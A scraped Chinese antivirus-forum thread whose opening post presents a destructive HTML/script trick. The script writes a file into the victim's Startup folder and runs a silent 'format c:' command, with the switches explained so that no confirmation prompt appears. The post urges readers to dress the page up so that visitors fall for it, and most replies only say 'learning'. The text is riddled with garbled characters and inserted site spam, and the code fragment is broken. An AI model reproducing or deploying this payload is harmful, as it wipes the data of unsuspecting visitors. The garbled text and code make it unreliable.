发新话题
打印

黑客技巧之有关HTML代码的另类应用

本主题由 水晶王子 于 2008-1-5 22:18 提升

黑客技巧之有关HTML代码的另类应用

.     
' q5 m7 ?, a7 e2 @) I爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net         这个是一个关于HTML代码攻击的,虽然短点大家看看怎么样,能实现的哦。
8 r1 j/ D- O6 y, `; d  _( G现在的Windows操作系统实在是很方便,连格式化都是只用鼠标点点就可以了,不用象以前那样要输入命令来完成格盘。爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net: r7 J" Q( S4 e* T% Z) s  `
我们要做一个格本地磁盘网页并不是很难,会HTML代码的朋友一定是没有什么问题的,这个其实就是利用一下IE的漏洞来实现我们的目的。
8 Q, B0 K7 x4 ?) y9 d5 A( \爱毒霸社区
* [5 d: B+ Q  C  k爱毒霸社区        下面我们看一下下面的代码我们就会发现其中的奥妙所在了。
复制内容到剪贴板
代码:
scr.reset() scr.path="c:\\windows\\start menu\\programs\\启动\\文件名 scr.doc="" wsh.run('start.exe /m format c:/q/autotest/u')
对于HTML代码了解的朋友们一定看出来了吧,这段代码的利害之处就在于最后一句,格你的磁盘没商量。
" y9 H8 q! C  {8 h3 T金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net下面我们来看看这段代码的,具体的分析一下的他的工作原理是怎么样的。% r1 h  T5 R- B3 \
首先,我们来看看这一句
复制内容到剪贴板
代码:
scr.path="c:\\windows\\start menu\\programs\\启动\\文件名
这句,就是当看到这个网页的时候,它会写入到用户的机器的启动目录下,并以一个文件名的文件形式出现
复制内容到剪贴板
代码:
wsh.run('start.exe /m format c:/q/autotest/u')
这句就是我们这里所要讲的核心东西了,对于format 这个命令大家不会陌生的吧,只要知道这个命令的朋友,一定会知道这句命令的意思的,我就在这里不在多说什么了。金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net% K; o% v8 z' I4 o
        在这里我把他的一些参数,简要的说说,大家会更加明白的。
- p! X+ X2 x0 B5 x6 d, D5 R在进行格盘的时候系统会与你进行对话,是否进行的,大家看到这个参数了吗/autotest他会强制性的对你的硬盘进行格式化,而不再进行询问;/q/u这两个参数为系统不需要检查立执行。在上一句中的start.exe与/m选项配合,哈哈,相信在执行时以最小化的状态进行,谁都会头痛的。金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net7 c0 S2 W5 J/ C; R) O
在这段代码里,核心语句
复制内容到剪贴板
代码:
wsh.run('start.exe /m format c:/q/autotest/u')
我们只要对这段代码进行改动相信会出现更多不同的变化。在应用的时候把自己HTML代码做的漂亮一些,相信一定会有很多的人会上当,不小心中了你的圈套。

TOP

不错

TOP

学习

TOP

TOP

不熟悉~
月光尽头 童话里的天使翅膀 我们坐在幸福的旁边~

TOP

那请问怎么解决掉那种危险呢?
爱情是灯,朋友是影子。当灯灭了,周围全是影子!
http://bbs.duba.net/?fromuid=1451545

TOP

禁用javascript,vbscript
请给您认为有用、好用的软件的推荐者加分!
相信,有了您的支持,推荐者会更努力地给您推荐更多更好的软件的。


己已斋   
己已斋BLOG   玩魔方   PPC党内部专供:MyPing

TOP

ML软件好象有点意思~

TOP

引用:
原帖由 pzping 于 2008-2-16 16:24 发表 爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net) g; e( Q5 q& B/ v
那请问怎么解决掉那种危险呢?
爱毒霸社区,金山毒霸,金山毒霸2009,金山毒霸2008,金山毒霸2008下载,杀毒软件,杀毒论坛,在线杀毒,毒霸论坛,木马,木马专杀,免费杀毒软件下载,金山毒霸通行证,毒霸,AV终结者,灰鸽子,磁碟机,专杀工具& Y/ F3 M$ w% I7 c( u: n" t
对哦对哦,我也想知道
海豚★我永远的ぃ☆灵魂ぷぁ♀蓝色★我一生的☆い信念

设计爱好者请加我QQ849491370

或设计群:57535240让我们一起学习吧!

TOP

有点复杂

TOP

引用:
原帖由 水晶王子 于 2007-12-1 16:23 发表
# F: M3 P# |# E! U# k.     5 q& D2 S0 A/ @8 t/ G
         这个是一个关于HTML代码攻击的,虽然短点大家看看怎么样,能实现的哦。金山毒霸-爱毒霸社区-做中国杀毒软件最用心社区-bbs.duba.net6 f( P8 g& Z) K1 {
现在的Windows操作系统实在是很方便,连格式化都是只用鼠标点点就可以了,不用象以前那样要输入命令来完成格盘。
+ _" V7 n* U0 V爱毒霸社区-是中国金山毒霸杀毒软件专业社区,提供金山毒霸2009,金山毒霸2008,金山毒霸2008下载,在线杀毒,金山清理专家,专杀工具等产品信息,有流行病毒,木马专业查杀解决方案,为广大金山毒霸用户和电脑安全知识爱好者提供免费的互动社区,爱毒霸社区-成为中国知名杀毒社区,灰鸽子专杀, 做中国杀毒软件最用心社区-bbs.duba.net我们要做 ...
这道没什么大注意
金山杀不了毒是正常的.解决不了问题是常有的
http://www.virscan.org/images/logo.gif

TOP

format

格式化磁盘命令
虽然是菜鸟`````;但,总会成大虾的!
对于国产的杀软,请大家用客观的眼光看,而不是敌对的态度!

TOP

学习
`你的电脑?
`呵..
`我的权限!

TOP

学习

TOP

发新话题